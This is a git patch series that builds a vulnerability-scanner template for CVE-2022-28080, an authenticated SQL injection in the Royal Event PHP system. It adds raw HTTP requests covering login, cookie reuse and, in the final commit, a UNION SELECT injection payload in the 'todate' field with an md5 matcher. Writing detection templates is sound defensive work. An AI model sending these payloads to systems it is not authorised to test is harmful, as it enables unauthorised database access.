From b15a183de2e4626cd716199324aaba2a79f39a7c Mon Sep 17 00:00:00 2001 From: lucasljm2001 Date: Wed, 15 Jun 2022 16:56:31 -0300 Subject: [PATCH 1/7] Create CVE-2022-28080.yaml --- cves/2022/CVE-2022-28080.yaml | 53 +++++++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 cves/2022/CVE-2022-28080.yaml diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml new file mode 100644 index 0000000000..e0d4206e47 --- /dev/null +++ b/cves/2022/CVE-2022-28080.yaml @@ -0,0 +1,53 @@ +id: CVE-2022-28080 + +info: + name: Royal Event - SQL Injection + author: lucasljm2001,ekrause + severity: high + description: Detects an SQL Injection vulnerability in Royal Event System + tags: cve,cve2022,sqli + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + +requests: + - raw: + - | + POST /royal_event/btndates_report.php#?= HTTP/1.1 + Host: {{Host}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Cache-Control: no-cache + Content-Length: 334 + Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 + Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?= + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="todate" + + -'select SomeRandomText from tbladmin-- + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="search" + + 3 + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + --f289a6438bcc45179bcd3eb7ddc555d0-- + + + matchers: + - type: word + words: + - "SomeRandomText" + + - type: status + status: + - 200 \ No newline at end of file From 131f5fe7a526c3371c8d0305c74f5765cd77d557 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Jun 2022 09:30:35 +0530 Subject: [PATCH 2/7] Update CVE-2022-28080.yaml --- cves/2022/CVE-2022-28080.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index e0d4206e47..9209586aa1 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -4,15 +4,16 @@ info: name: Royal Event - SQL Injection author: lucasljm2001,ekrause severity: high - description: Detects an SQL Injection vulnerability in Royal Event System - tags: cve,cve2022,sqli + description: | + Detects an SQL Injection vulnerability in Royal Event System reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 + tags: cve,cve2022,sqli,authenticated requests: - raw: @@ -50,4 +51,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 3f0dcae959c94a36b0fdf7a6ce3b7dd7feb9f633 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Jun 2022 09:31:27 +0530 Subject: [PATCH 3/7] Update CVE-2022-28080.yaml --- cves/2022/CVE-2022-28080.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index 9209586aa1..ecbc92f897 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -16,8 +16,8 @@ info: tags: cve,cve2022,sqli,authenticated requests: - - raw: - - | + - raw: + - | POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: {{Host}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 @@ -28,7 +28,7 @@ requests: Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 - + --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="todate" From 201c321f9d38aec2a5f455cf188d13a04ecd630b Mon Sep 17 00:00:00 2001 From: lucasljm2001 Date: Thu, 16 Jun 2022 10:09:04 -0300 Subject: [PATCH 4/7] Added cookie-reuse --- cves/2022/CVE-2022-28080.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index e0d4206e47..d74994e9ac 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -42,6 +42,7 @@ requests: 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0-- + cookie-reuse: true matchers: - type: word From fb507906858ed210336eb7d34fa8a193831b21cd Mon Sep 17 00:00:00 2001 From: lucasljm2001 Date: Thu, 16 Jun 2022 10:11:28 -0300 Subject: [PATCH 5/7] Update CVE-2022-28080.yaml --- cves/2022/CVE-2022-28080.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index a19fed4a22..1d7ad6e91f 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -43,13 +43,13 @@ requests: 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0-- - cookie-reuse: true + cookie-reuse: true - matchers: - - type: word - words: - - "SomeRandomText" + matchers: + - type: word + words: + - "SomeRandomText" - - type: status - status: - - 200 + - type: status + status: + - 200 From 8550551e12705ad688a82983c1ff3c3a08de2d90 Mon Sep 17 00:00:00 2001 From: lucasljm2001 Date: Fri, 17 Jun 2022 18:54:52 -0300 Subject: [PATCH 6/7] Added login --- cves/2022/CVE-2022-28080.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index 1d7ad6e91f..555a81ec0c 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -17,6 +17,42 @@ info: requests: - raw: + + - | + POST /royal_event/ HTTP/1.1 + Host: {{Host}} + Content-Length: 353 + Cache-Control: max-age=0 + sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102" + sec-ch-ua-mobile: ?0 + sec-ch-ua-platform: "Windows" + Upgrade-Insecure-Requests: 1 + Origin: {{Scheme}}://{{Host}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary841M7QIgh7rqLsVh + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Sec-Fetch-Site: same-origin + Sec-Fetch-Mode: navigate + Sec-Fetch-User: ?1 + Sec-Fetch-Dest: document + Referer: {{Scheme}}://{{Host}}/royal_event/ + Accept-Encoding: gzip, deflate + Accept-Language: es-ES,es;q=0.9 + Connection: close + + ------WebKitFormBoundary841M7QIgh7rqLsVh + Content-Disposition: form-data; name="username" + + {{username}} + ------WebKitFormBoundary841M7QIgh7rqLsVh + Content-Disposition: form-data; name="password" + + {{password}} + ------WebKitFormBoundary841M7QIgh7rqLsVh + Content-Disposition: form-data; name="login" + + + ------WebKitFormBoundary841M7QIgh7rqLsVh-- - | POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: {{Host}} From caf26c0f50b33549127ab1202456f15a03b7e1b7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 22 Jun 2022 11:33:57 +0530 Subject: [PATCH 7/7] Update CVE-2022-28080.yaml --- cves/2022/CVE-2022-28080.yaml | 90 +++++++++++++---------------------- 1 file changed, 34 insertions(+), 56 deletions(-) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index 555a81ec0c..9ef9f47616 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -2,90 +2,68 @@ id: CVE-2022-28080 info: name: Royal Event - SQL Injection - author: lucasljm2001,ekrause + author: lucasljm2001,ekrause,ritikchaddha severity: high description: | Detects an SQL Injection vulnerability in Royal Event System reference: + - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - tags: cve,cve2022,sqli,authenticated + tags: cve,cve2022,sqli,authenticated,cms,royalevent requests: - - raw: - + - raw: - | POST /royal_event/ HTTP/1.1 - Host: {{Host}} - Content-Length: 353 - Cache-Control: max-age=0 - sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102" - sec-ch-ua-mobile: ?0 - sec-ch-ua-platform: "Windows" - Upgrade-Insecure-Requests: 1 - Origin: {{Scheme}}://{{Host}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary841M7QIgh7rqLsVh - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Referer: {{Scheme}}://{{Host}}/royal_event/ - Accept-Encoding: gzip, deflate - Accept-Language: es-ES,es;q=0.9 - Connection: close + Host: {{Hostname}} + Content-Length: 353 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="username" + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="username" - {{username}} - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="password" + {{username}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="password" - {{password}} - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="login" + {{password}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="login" - ------WebKitFormBoundary841M7QIgh7rqLsVh-- + ------WebKitFormBoundaryCSxQll1eihcqgIgD-- + - | - POST /royal_event/btndates_report.php#?= HTTP/1.1 - Host: {{Host}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Encoding: gzip, deflate - Accept-Language: en-us,en;q=0.5 - Cache-Control: no-cache - Content-Length: 334 - Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 - Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?= - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + POST /royal_event/btndates_report.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD - --f289a6438bcc45179bcd3eb7ddc555d0 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="todate" - -'select SomeRandomText from tbladmin-- - --f289a6438bcc45179bcd3eb7ddc555d0 + 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="search" 3 - --f289a6438bcc45179bcd3eb7ddc555d0 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="fromdate" 01/01/2011 - --f289a6438bcc45179bcd3eb7ddc555d0-- + ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - cookie-reuse: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '{{md5("{{randstr}}")}}' - matchers: - - type: word - words: - - "SomeRandomText" - - - type: status - status: - - 200 + - type: status + status: + - 200